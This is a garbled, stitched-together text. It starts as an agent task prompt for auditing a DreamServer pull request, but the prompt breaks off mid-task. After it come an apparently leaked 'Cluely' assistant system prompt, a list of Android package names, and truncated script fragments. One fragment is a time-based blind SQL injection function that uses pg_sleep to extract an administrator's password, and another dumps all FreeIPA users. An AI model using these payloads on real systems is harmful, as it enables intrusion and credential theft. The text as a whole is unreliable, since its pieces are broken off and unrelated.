KrE80r

You have access to the DreamServer repository (Light-Heart-Labs/DreamServer). The repo is public, so you can read PRs, diffs, and comments without authentication — but the unauth GitHub API is rate-limited to 60 req/hr, so prefer cloning the repo and using git fetch origin pull/<N>/head:refs/pull/<N>/head over hammering the API. You have a fresh Linux VM with internet, a Python environment, standard CLI tools, git, the GitHub CLI (gh, unauthenticated), Docker (you can run sibling containers via the mounted host socket), GPU access on the host, and no time limit, no tool call limit, no output length limit.

Your task: audit one open pull request and produce a complete review with a merge/revise/reject recommendation. The audience is the project lead, who needs to decide whether this single PR is safe to merge into a project that has 400+ stars, active contributors with bounty incentives, and a partnership with AMD's developer program. Quality bar matters; speed of merge does not.

**The PR to audit: #1

<core_identity> You are an assistant called Cluely, developed and created by Cluely, whose sole purpose is to analyze and solve problems asked by the user or shown on the screen. Your responses must be specific, accurate, and actionable. </core_identity>

<general_guidelines>

NEVER use meta-phrases (e.g., "let me help you", "I can see that").
NEVER summarize unless explicitly requested.
NEVER provide unsolicited advice.
NEVER refer to "screenshot" or "image" - refer to it as "the screen" if needed.
ALWAYS be specific, detailed, and accurate.

	Draziw.Button.Mines
	ag.video_solutions.wedotv
	ahf.dummynation
	ai.socialapps.speakmaster
	air.com.beachbumgammon
	air.com.freshplanet.games.SongPop2
	air.com.gamesys.mobile.slots.jpj
	air.com.goodgamestudios.empirefourkingdoms
	air.com.kitchenscramble.goo
	air.com.lalaplay.rummy45

	#!/bin/bash

	# Function to download proxies using curl
	download_proxies() {
	url=$1
	output_file=$2
	curl -s "$url" -o "$output_file"
	}

	# Function to add a prefix to proxy files

	import requests
	from requests.packages.urllib3.exceptions import InsecureRequestWarning

	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	import re
	import sys

	if len(sys.argv) != 2:
	print("USAGE: exploit.py <url>")
	sys.exit(1)

	import requests, signal, sys, re

	def read_file(file):
	content = []

	f = open(file, "r")
	while(True):
	linea = f.readline().rstrip('\n')
	content.append(linea)
	if not linea:

	import requests, signal, sys

	def read_file(file):
	content = []

	f = open(file, "r")
	while(True):
	linea = f.readline().rstrip('\n')
	content.append(linea)
	if not linea:

	import requests, signal, sys, string, random

	def read_file(file):
	content = []

	f = open(file, "r")
	while(True):
	linea = f.readline().rstrip('\n')
	content.append(linea)
	if not linea:

	import requests
	import sys
	import string
	def blind_sql_injection(url, length):
	output = ''
	target = url
	headers={}
	chars = string.digits + string.ascii_letters
	for i in range(1, length+1):
	base_cookie = "TrackingId=VVXZ5soYhRzXLKyj'%%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,%s,1)='[CHAR]')+THEN+pg_sleep(8)+ELSE+pg_sleep(0)+END+FROM+users--; session=OgsZsGdBcQnsSGqgwH3DXryrixIpLxn9"%(str(i))

	#!/usr/bin/python2

	from ipalib import api

	api.bootstrap(context="exporter", debug=False)
	api.finalize()
	api.Backend.rpcclient.connect()

	users = api.Command["user_find"](all=True)["result"]